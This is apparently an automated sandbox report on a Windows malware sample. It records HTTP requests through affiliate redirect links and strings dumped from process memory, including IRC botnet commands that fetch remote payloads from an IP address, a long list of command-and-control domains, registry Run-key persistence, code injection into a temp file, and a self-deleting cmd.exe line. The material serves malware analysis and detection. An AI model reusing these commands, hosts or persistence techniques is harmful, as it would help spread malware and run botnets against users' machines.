X-Amz-Cf-Id: 3REdmkZMO_NuJcnW5uuXxOUnFM2R-PY9D3fydvyT-voco8tvb33uWw==
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://way.doorcrayon.bid/aff_c?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid%3D5c12d1104cca24294ae7d8d45ce8d028&v=3">here</a></body>
<<< skipped >>>
GET hXXp://way.doorcrayon.bid/aff_c?offer_id=4&aff_id=3226&source=4364&aff_sub=&aff_sub2=&aff_sub3=&aff_sub4=LP_DEF&aff_sub5=1300290818&url=http://fun.losscook.bid/offer.php?affId={aff_id}&trackingId=244218551&instId=4364&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: way.doorcrayon.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 26 Jun 2017 09:49:44 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://fun.losscook.bid/offer.php?affId=3226&trackingId=244218551&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.11.8
Set-Cookie: enc_aff_session_4=ENC0391055f458cc8b37a857b50cf2cbe4e5c01da4e3762e92b0cf8bcd70833c1f1efdda3a26923f113d99e769ea43a114742b8db68809880e01a1d3bb95070085d01aaaec65a60daa189fe1f566eb9a5124e35dca6515f180763d031992487d9ae69f4c8ab1a030345ed76ef11bd4dbab698d4f0d9494223af014ce420c84e53d2f00aa714e4; expires=Wed, 26 Jul 2017 09:49:44 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiSW5zdGFsbENhcGl0YWwiLCJjb25uZWN0aW9uX3NwZWVkIjoiYnJvYWRiYW5kIn0=; expires=Wed, 20 May 2020 20:29:44 GMT; path=/;
tracking_id: 102818683555b138ae887006bd7923
X-Robots-Tag: noindex, nofollow
Content-Length: 488
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="hXXp://fun.losscook.bid/offer.php?affId=3226&trackingId=244218551&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3">here</a>.</p>
</body></html>
<<< skipped >>>
<<< undecodable binary fragment skipped >>>
GET hXXp://fun.losscook.bid/offer.php?affId=3226&trackingId=244218551&instId=4364&ho_trackingid=102818683555b138ae887006bd7923&cc=UA&cc_typ=ho&sb=x86&net=4.5.50709&ie=9.0.8112.16421&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=3 HTTP/1.1
Host: fun.losscook.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 3808
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Mon, 26 Jun 2017 09:49:32 GMT
X-Cache: Miss from cloudfront
Via: 1.1 a9e1c5fff6a2739d3f7026c216819292.cloudfront.net (CloudFront)
X-Amz-Cf-Id: i7ut4Xvh-5P_-WV00kiFYbu2ky0zKT4Y6iku9EKww65x6xjhm4NckA==
<<< 3808-byte binary body (served as Content-Type: text/html) skipped >>>
The Virus connects to the servers at the following location(s):
!Win32 .EXE.
/Default.htm
mscoree.dll
Please contact the application's support team for more information.
portuguese-brazilian
GetProcessWindowStation
user32.dll
kernel32.dll
.tgPV
udPj
FTPjK
FtPj;
C.PjRVj
u.VV3
c:\%original file name%.exe
<LINK REL=STYLESHEET HREF="icw.css" TYPE="text/css">
<SCRIPT LANGUAGE="Javascript" src="icw.js"></SCRIPT>
<IMG SRC="icwhd2.gif" WIDTH=317 HEIGHT=71 BORDER="0">
<img src="arrow_dwn.gif" alt="" border="0"><br>
<IMG SRC="nvlinfad.gif" alt="" WIDTH=1 HEIGHT=291 BORDER="0">
<IMG SRC="linefade_hrz.gif" alt="" WIDTH=17 HEIGHT=1 BORDER="0">
<DIV CLASS="wrapper" Style="background:url(toccolor.gif);" ID=loc2><A HREF="" onclick=doNothing() onfocus=selectIt(1) Style="color:red;" ID="menu_1">Welcome</A></DIV>
<BUTTON DIR=LTR CLASS="buttons" onclick="self.close()" Style="position:absolute;top:349px;left:498px;width:70px;" ACCESSKEY="C" ID=loc7><u>C</u>lose</BUTTON>
<img id=globe1 src="hm_globe.jpg" width=148 height=148 border="0">
<img id=globe2 style="position: absolute; top:6px; left:61px; width=148px; height=148px; z-index:9; clip:rect(25px 37px 78px 0px)" src="hm_globe.jpg">
<P ID=loc10>The Internet includes the World Wide Web, which enables you to see documents in richly formatted text and pictures. Many Web pages link to other Web pages, so it's easy to browse, or "surf", a large amount of information by just clicking with your mouse.</P>
<P ID=loc14>Perhaps you're wondering how the Internet might help you. Do you want to plan a trip? Check out sports scores? Shop online for books, clothes, or even cars? Read online newspapers and magazines from around the world?</P>
<P ID=loc18>Connecting to the Internet involves a modem, a phone line, and an Internet service provider (ISP). An ISP is a company that provides you with Internet connection service through your phone line. You'll find a wide range of ISPs that provide different services, such as e-mail or your own Web page, and pricing levels. If you want, you can choose one in the Internet Connection wizard.</P>
.wrapper {.detail {.content {.buttons {document.oncontextmenu=killcontext;
document.onkeydown=keyhandler;
document.onmousedown=killrightmouse;
window.onload=init;
event.returnValue = false;
var oItem = document.all["menu_" + iItem];
var oItemWrap = oItem.parentElement;
iCurrent = oCurrent.id.substr(oCurrent.id.indexOf("_") + 1);oCurrent.parentElement.style.backgroundImage = "none";
oCurrent.style.color = normColor;
oCurrent.style.cursor = "hand";
oCurrent.style.textDecoration = "";
document.all["content_" + iCurrent].style.display = "none";
oItemWrap.style.backgroundImage = "url(toccolor.gif)";
oItem.style.cursor = "default";
oItem.style.color = highColor;
oItem.style.textDecoration = "none";
hzLine.style.top = oItemWrap.offsetTop - 73;
hzLine.style.visibility = "visible";
document.all["content_" iItem].style.display = "inline";
if (event != null) event.returnValue = false;
oCurrent = document.all.menu_1;
// Key handler
// general purpose key handler
function keyhandler()
var iKey = window.event.keyCode;
//up, down and tab keys for toc
switch(iKey){document.all["menu_" iFocus].focus();
// Function key f5
if (iKey == 0x74) {window.event.cancelBubble = true;
window.event.returnValue = false;
//control hotkeys
if(window.event.ctrlKey) {switch(iKey) {case 0x65: // keypad 5
window.event.returnValue = false;
//test for escape key and bail if appropriate
if(window.event.keyCode == 0x1b) {self.close();
window.event.returnValue = false;
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
hustxt.com
jhampt.com
naltix.com
ukerix.com
fbibiz.com
NICK kbmhirat
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
ole32.dll
urlmon.dll
CreateURLMoniker
OLEAUT32.dll
MSHTML.DLL
6.00.2600.0000 (xpclient.010817-1148)
icwtutor.exe
Windows
Operating System
6.00.2600.0000
ARROW_DWN.GIF
DEFAULT.HTM
HM_GLOBE.JPG
ICW.CSS
ICW.JS
ICWHD2.GIF
LINEFADE_HRZ.GIF
NVLINFAD.GIF
TOCCOLOR.GIF
%original file name%.exe_3788_rwx_000A0000_00008000:
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
hustxt.com
jhampt.com
naltix.com
ukerix.com
fbibiz.com
NICK nxtitcxs
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
:u. PRIVMSG nxtitcxs :!get hXXp://185.145.131.197:9/mk/li.jpg
:u. PRIVMSG nxtitcxs :!get hXXp://185.145.131.197:9/mk/ic.jpg
UNC\192.168.50.163\SANDBOXOUTPUT\2017-06-26\7874A076B2F09A3F7969B819CB4955E0\DUMPS\7874A076B2F09A3F7969B819CB4955E0.EXE_3788.DMP
%WinDir%\SYSTEM32\MAGNIFY.EXE
PLAYER.EXE
iuayhc.com
koeore.com
vjqwcn.com
altfrk.com
ldqoqh.com
zonaeh.com
mxdonb.com
yzblel.com
yateek.com
qgvkvi.com
eatiem.com
nmkdce.com
uzbbmc.com
slihvp.com
qmhqsx.com
fxeehe.com
zpajoi.com
gqihno.com
ndwxfb.com
hecelb.com
rlhbxw.com
vbtyid.com
eifypo.com
tewauv.com
pvaadh.com
ieyimg.com
aehzzq.com
qlremo.com
etkiwx.com
odfpip.com
jzoetx.com
cvdxai.com
ojzyoe.com
xophrk.com
zzxpac.com
uuacla.com
tvvyua.com
uimqdi.com
ksvyuu.com
rhbgyc.com
jsumot.com
eaorba.com
jwddsi.com
hydoye.com
aayogx.com
eakgwm.com
zroypl.com
iakaeu.com
oyuvyi.com
hvoihl.com
orndsy.com
fcuhln.com
vvfihg.com
dljeva.com
ramola.com
voeinl.com
phkrqp.com
vakeat.com
ztbjvh.com
qcczbr.com
ibluie.com
yaoglr.com
uebdwg.com
rheobg.com
mieuof.com
fclexk.com
aosvol.com
vtqvbu.com
ebyeqk.com
nluphu.com
ogeagu.com
eicssl.com
hkicuu.com
blurbi.com
bzepui.com
gvqdia.com
vyxbyy.com
maqleg.com
qaftzy.com
exwaek.com
uzaneb.com
etzziq.com
dwaimw.com
auswii.com
joqupn.com
aaonbn.com
vazqus.com
abooba.com
uodtgy.com
myituj.com
uomyya.com
gypheh.com
oiovej.com
xowqiv.com
yubths.com
ciaaoa.com
xhevvr.com
xdlacf.com
kqsapt.com
erhxxc.com
JOIN #.130
%original file name%.exe_3788_rwx_01001000_0001B000:
/Default.htm
mscoree.dll
Please contact the application's support team for more information.
portuguese-brazilian
GetProcessWindowStation
user32.dll
kernel32.dll
.tgPV
udPj
FTPjK
FtPj;
C.PjRVj
u.VV3
c:\%original file name%.exe
<LINK REL=STYLESHEET HREF="icw.css" TYPE="text/css">
<SCRIPT LANGUAGE="Javascript" src="icw.js"></SCRIPT>
<IMG SRC="icwhd2.gif" WIDTH=317 HEIGHT=71 BORDER="0">
<img src="arrow_dwn.gif" alt="" border="0"><br>
<IMG SRC="nvlinfad.gif" alt="" WIDTH=1 HEIGHT=291 BORDER="0">
<IMG SRC="linefade_hrz.gif" alt="" WIDTH=17 HEIGHT=1 BORDER="0">
<DIV CLASS="wrapper" Style="background:url(toccolor.gif);" ID=loc2><A HREF="" onclick=doNothing() onfocus=selectIt(1) Style="color:red;" ID="menu_1">Welcome</A></DIV>
<BUTTON DIR=LTR CLASS="buttons" onclick="self.close()" Style="position:absolute;top:349px;left:498px;width:70px;" ACCESSKEY="C" ID=loc7><u>C</u>lose</BUTTON>
<img id=globe1 src="hm_globe.jpg" width=148 height=148 border="0">
<img id=globe2 style="position: absolute; top:6px; left:61px; width=148px; height=148px; z-index:9; clip:rect(25px 37px 78px 0px)" src="hm_globe.jpg">
<P ID=loc10>The Internet includes the World Wide Web, which enables you to see documents in richly formatted text and pictures. Many Web pages link to other Web pages, so it's easy to browse, or "surf", a large amount of information by just clicking with your mouse.</P>
<P ID=loc14>Perhaps you're wondering how the Internet might help you. Do you want to plan a trip? Check out sports scores? Shop online for books, clothes, or even cars? Read online newspapers and magazines from around the world?</P>
<P ID=loc18>Connecting to the Internet involves a modem, a phone line, and an Internet service provider (ISP). An ISP is a company that provides you with Internet connection service through your phone line. You'll find a wide range of ISPs that provide different services, such as e-mail or your own Web page, and pricing levels. If you want, you can choose one in the Internet Connection wizard.</P>
.wrapper {.detail {.content {.buttons {document.oncontextmenu=killcontext;
document.onkeydown=keyhandler;
document.onmousedown=killrightmouse;
window.onload=init;
event.returnValue = false;
var oItem = document.all["menu_" iItem];
var oItemWrap = oItem.parentElement;
iCurrent = oCurrent.id.substr(oCurrent.id.indexOf("_") 1);oCurrent.parentElement.style.backgroundImage = "none";
oCurrent.style.color = normColor;
oCurrent.style.cursor = "hand";
oCurrent.style.textDecoration = "";
document.all["content_" iCurrent].style.display = "none";
oItemWrap.style.backgroundImage = "url(toccolor.gif)";
oItem.style.cursor = "default";
oItem.style.color = highColor;
oItem.style.textDecoration = "none";
hzLine.style.top = oItemWrap.offsetTop - 73;
hzLine.style.visibility = "visible";
document.all["content_" iItem].style.display = "inline";
if (event != null) event.returnValue = false;
oCurrent = document.all.menu_1;
// Key handler
// general purpose key handler
function keyhandler()
var iKey = window.event.keyCode;
//up, down and tab keys for toc
switch(iKey){document.all["menu_" iFocus].focus();
// Function key f5
if (iKey == 0x74) {window.event.cancelBubble = true;
window.event.returnValue = false;
//control hotkeys
if(window.event.ctrlKey) {switch(iKey) {case 0x65: // keypad 5
window.event.returnValue = false;
//test for escape key and bail if appropriate
if(window.event.keyCode == 0x1b) {self.close();
window.event.returnValue = false;
ADVAPI32.DLL
JOIN #.%d
DSTAMP %ddd
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
hustxt.com
jhampt.com
naltix.com
ukerix.com
fbibiz.com
NICK kbmhirat
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x *%s
KERNEL32.DLL
windowsupdate
drweb
ole32.dll
urlmon.dll
CreateURLMoniker
OLEAUT32.dll
MSHTML.DLL
INJ98A6.tmp_2368:
.text
`.rdata
@.data
.rsrc
@.reloc
D$@j.Xf
FH<.tP<[tL<\tH<*tD<|t@<^t<<$t8
PSSSSSSh
u$SShe
t.SSj
PSSh\
j.Yf;
_tcPVj@
.PjRW
Kernel32.dll
CCmdTarget
Comdlg32.dll
Comctl32.dll
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CNotSupportedException
TaskDialogIndirect
RegDeleteKeyExW
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
\*/:<>?|"
ec2-34-225-180-32.compute-1.amazonaws.com
390113312
()$^.* ?[]|\-{},:=!AmigoDistrib.exe
%LOCALAPPDATA%\Amigo\Application\amigo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
URL =
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
aswhookx.dll
Line %d, Column %d
Bad URL.
Cannot get file size, bad URL.
Request cannot be completed on current url.
Unable to get HTTP status:
ReportStart request failed. Bad data received: "
ReportFinish request failed. Bad data received: "
ReportComponent request failed. Bad data received: "
ReportDefaultComponent failed. Bad data received: "
ReportClose request failed. Bad data received: "
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
HKEY_CLASSES_ROOT\http\shell\open\command
opera
HttpSendRequestW
HttpQueryInfoW
HttpOpenRequestW
InternetCanonicalizeUrlW
WININET.dll
GetProcessHeap
GetCPInfo
KERNEL32.dll
EnumWindows
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
CreateDialogIndirectParamW
USER32.dll
GetViewportExtEx
SetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
RegDeleteKeyW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
GdiplusShutdown
gdiplus.dll
OLEACC.dll
zcÁ
.?AVCCmdUI@@
.PAVCException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.PAVCMemoryException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.?AVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.PAVCFileException@@
.?AVCCmdTarget@@
.?AVHttpDownloaderException@@
.?AVHttpDownloader@@
reV%%F
q2.DN
p~uR%x
#.sZa
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
"All files (*.*)" = "
(*.*)"
"All files (*.*)" = "All files (*.*)"
3M4
6|7V8
9"9&9*919
2#21292?2
8#8)848[8
4 4$4(4,40444~4
4_5l5x5
4 4&404;4~4
1 1$1(1,10141
4 4$4(4,4044484<4@4
=,=8=\=|=
HKernel32.dll
HComdlg32.dll
Ikernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
accKeyboardShortcut
commctrl_DragListMsg
Afx:%p:%x
Afx:%p:%x:%p:%p:%p
user32.dll
hhctrl.ocx
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
Df:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
comctl32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Dmfcm120u.dll
dshell32.dll
ED2D1.dll
DWrite.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
lXXxXXXXXXXX
combase.dll
Fmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
cmd.exe /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "%s"
cmd.exe /C timeout 3 > Nul & Del "%s"
hXXp://megadowl.com/terms-ru.html
All files (*.*)
r.ico
. Component url:
chrome
firefox
s.lnk
\amigo.exe
application/exe
application/x-dosexec
WINDOWS
\\.\PhysicalDrive%d
Advapi32.dll
x-x-x-x-x-x
oIphlpapi.dll
hXXp://
explorer.exe
_Label_Url_
Wininet.dll
ntdll.dll
C:\Windows\TEMP\INJ98A6.tmp
Citizen_Cope.mp3
1340951093
C:\Download
5.5.4
cubeload.ru
request/report?
&key=
User-Agent: /Content-Type: application/x-www-form-urlencoded
\\.\PhysicalDrive
ÞSKTOP%
%DOWNLAODS%
windows
downloads!hXXp://megadowl.com/terms-ru.html
HKLM\Software\WineYHKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice\ProgIdNHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\regexp:.*\DisplayName
file_url
file_url_domain
send_report_type
reg_key
ReportStart failed
ReportClose failed
ReportFinish failed
ReportComponent failed
by url:
Failed executing file:
report_delay
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS?HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version
. File URL:
HKEY_CURRENT_USER\Software\Wine HKEY_LOCAL_MACHINE\Software\Wine,SOFTWARE\Microsoft\Windows NT\CurrentVersion
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
INJ98A6.tmp_2368_rwx_00400000_00154000:
.text
`.rdata
@.data
.rsrc
@.reloc
D$@j.Xf
FH<.tP<[tL<\tH<*tD<|t@<^t<<$t8
PSSSSSSh
u$SShe
t.SSj
PSSh\
j.Yf;
_tcPVj@
.PjRW
Kernel32.dll
CCmdTarget
Comdlg32.dll
Comctl32.dll
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
CNotSupportedException
TaskDialogIndirect
RegDeleteKeyExW
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
\*/:<>?|"
ec2-34-225-180-32.compute-1.amazonaws.com
390113312
()$^.* ?[]|\-{},:=!AmigoDistrib.exe
%LOCALAPPDATA%\Amigo\Application\amigo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
URL =
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Amigo
aswhookx.dll
Line %d, Column %d
Bad URL.
Cannot get file size, bad URL.
Request cannot be completed on current url.
Unable to get HTTP status:
ReportStart request failed. Bad data received: "
ReportFinish request failed. Bad data received: "
ReportComponent request failed. Bad data received: "
ReportDefaultComponent failed. Bad data received: "
ReportClose request failed. Bad data received: "
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
HKEY_CLASSES_ROOT\http\shell\open\command
opera
HttpSendRequestW
HttpQueryInfoW
HttpOpenRequestW
InternetCanonicalizeUrlW
WININET.dll
GetProcessHeap
GetCPInfo
KERNEL32.dll
EnumWindows
GetKeyState
SetWindowsHookExW
UnhookWindowsHookEx
CreateDialogIndirectParamW
USER32.dll
GetViewportExtEx
SetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegCreateKeyExW
RegQueryInfoKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
RegDeleteKeyW
RegEnumKeyW
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
ole32.dll
OLEAUT32.dll
oledlg.dll
GdiplusShutdown
gdiplus.dll
OLEACC.dll
zcÁ
.?AVCCmdUI@@
.PAVCException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.PAVCMemoryException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCObject@@
.PAVCResourceException@@
.PAVCSimpleException@@
.?AVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@
.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@
.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
.PAVCFileException@@
.?AVCCmdTarget@@
.?AVHttpDownloaderException@@
.?AVHttpDownloader@@
reV%%F
q2.DN
p~uR%x
#.sZa
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
"All files (*.*)" = "
(*.*)"
"All files (*.*)" = "All files (*.*)"
3M4
6|7V8
9"9&9*919
2#21292?2
8#8)848[8
4 4$4(4,40444~4
4_5l5x5
4 4&404;4~4
1 1$1(1,10141
4 4$4(4,4044484<4@4
=,=8=\=|=
HKernel32.dll
HComdlg32.dll
Ikernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
accKeyboardShortcut
commctrl_DragListMsg
Afx:%p:%x
Afx:%p:%x:%p:%p:%p
user32.dll
hhctrl.ocx
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewform.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
Df:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
lX-X-x-XX-XXXXXX
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
comctl32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Dmfcm120u.dll
dshell32.dll
ED2D1.dll
DWrite.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
lXXxXXXXXXXX
combase.dll
Fmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
cmd.exe /C ping 1.1.1.1 -n 1 -w 4000 > Nul & Del "%s"
cmd.exe /C timeout 3 > Nul & Del "%s"
hXXp://megadowl.com/terms-ru.html
All files (*.*)
r.ico
. Component url:
chrome
firefox
s.lnk
\amigo.exe
application/exe
application/x-dosexec
WINDOWS
\\.\PhysicalDrive%d
Advapi32.dll
x-x-x-x-x-x
oIphlpapi.dll
hXXp://
explorer.exe
